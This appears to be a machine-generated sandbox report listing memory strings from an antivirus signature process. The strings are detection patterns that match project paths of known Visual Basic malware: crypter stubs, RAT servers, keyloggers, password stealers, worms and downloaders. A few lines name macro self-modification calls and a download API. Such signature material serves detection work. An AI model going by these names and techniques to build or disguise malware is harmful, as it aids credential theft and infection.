Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: -(.+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: /*.+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Admin\Desktop\other_cr\R_PE\2201\_CLC.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: 0+.+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: .+:\\aw1\\Etmscztha.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: *\AD:\Documents\Documents11\Secret\Basic\Update\Worm+Trojan\worm.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\.+\\Nueva carpeta\\###################################################################################################################################.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: f\MurdeR\Escritorio\Desktop\cypter\stub\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: TOC:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp Binary or memory string: prjGenerator.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: 0+.+:\\.*NOVO.+\\BLINDADO\\PluginBrada.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: @\Hugo Tools\DRONES\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: V\Stuffs\w32.AntiAnarchy.E@mm\Havoc.Worm.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: '".+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: /*.+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: Z*\AE:\Stuff\Lilith Premium\Start\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: C:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: &!C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: 4/:\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: .+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: 72E:\\kaynak( Kod|~1)\\spynma(il_Merged|~1).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: MSVBVM60.DLLd \DBSpy\DBSpy.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: \IELOCK.VBP
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: \CEF\VBBHO.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: .+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: .+:\\.*NOVO.+\\BLINDADO\\PluginBrada.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: \MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 61.+:\\.*\\MicroApp.*\\MicroProCon\\MicrostCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\astronalta\\Meus documentos\\.+\\LOAD_GEAR\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6329226003.00000197A33A2000.00000004.00000001.sdmp Binary or memory string: C:\NuAT.vbp]
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: :\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: p\new2911.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: >\legal notice viri\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: .+\\Cryptosy\\Stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: .+:\\SoUrCe.*!\\.*SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: AC:\Atari.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: 2\Clemis-Gay\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: PProgramKecil\SetanWare\LWDay.2\LWDay.vbp
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: .+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \REeB.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: D:\\.+\\.+fcx\\.+1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 2sharK\Server\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ,Z:\a_new_dll\VIVAX.vbp]
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp Binary or memory string: ^Systema So as ipanema tem\INSTALL\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: :\captura\joinner\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: :\\Jhocko\\Loader\\Loader.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: .+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: ^\ie.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: H\Users\User\Desktop\hta\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: .+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: D:\\Setup\\Drivers\\Audio\\Installs_the_RealTek_AC_97_audio_driver\\WDM5630\\Documents\\Documents11\\Secret\\Basic\\Updated\\Dao chich\\final 007 spy\\.+\.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\SqUeEzEr\Desktop\OPENSC CODES FROM ME\Downloader\.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: .+:\\Apub\\Cyfjrvepg.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 0MicroProCon\MicroCon.vbp
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: >9C:\\Users\\Trovao\\Desktop\\.*\\Puxa - Fora\\oriente.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: ,\Asmahani\Asmahani.vbp
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp Binary or memory string: lgC:\\(DOCUME~1|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win|wix|WS86).+?\.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: &Desktop\ery\ery.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: :5C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: :\\.+\\mStubmmmm\\Backup-.+\\Backup-.+\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: 50.+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: bradesco.vbp
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: RF:\vb\VISUAL BASIC\VARIOS\teuer\Teuer.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: 6\NotPHP +RSRC SQlite\sm.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: Safety.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 4\MicroProCon\SeconFile.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: 2-.+:\\clean ppi\\temp\\.+\\DownloadBinary.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: OJC:\\Documents and Settings\\uko\\Desktop\\PRIMO\\NOVOLOAD.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp Binary or memory string: ,:\revolucao\SysBox.vbpax
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp Binary or memory string: @*\AD:\Master\ADWARA_NEW\codec\Codec.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: 3.D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: A<C:\\Games\\.*\\Crypter\\Crypter Source\\Stub\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp Binary or memory string: \trash\VB\Bus_dest\bus_des2.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \Revolta.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: T@*\AC:\Dan\sources\RAT Server\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\.+Cal.*smalar\\FlooDer\\FLooDeR.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: C:.+\\IJEFJIJEFGIJE.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: 1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: \Sp-Binder\Extracter\SpBinderExtracter.vbp]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: Jwarka\kul\201-solitaire\Solitaire.vbp
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: >9.+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: .+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: .+:\\HELLS.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: \sYs__Tem.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp Binary or memory string: \proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \WebCounter\Source\WebCounter.vbp
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp Binary or memory string: *.sln.|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: $Neagato_Hotela.vbp]
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: <iXato\PharOlniNe\Proyecto1.vbp]
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: ,'.+:\\SoUrCe.*!\\.*SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: LD:\Master\bb_soft\n_07_10_2008\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: UPD:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: C:\\.*A.*\\B\\Base.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \ffzefzefz.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: LD:\Master\bb_soft\n_13_10_2008\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 2\folder_x\File Folder.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: \po\Cdmator.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: $\WEBPNT\weBpnt.VBp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: Serega\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: A<C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: vbSendMail.vbp
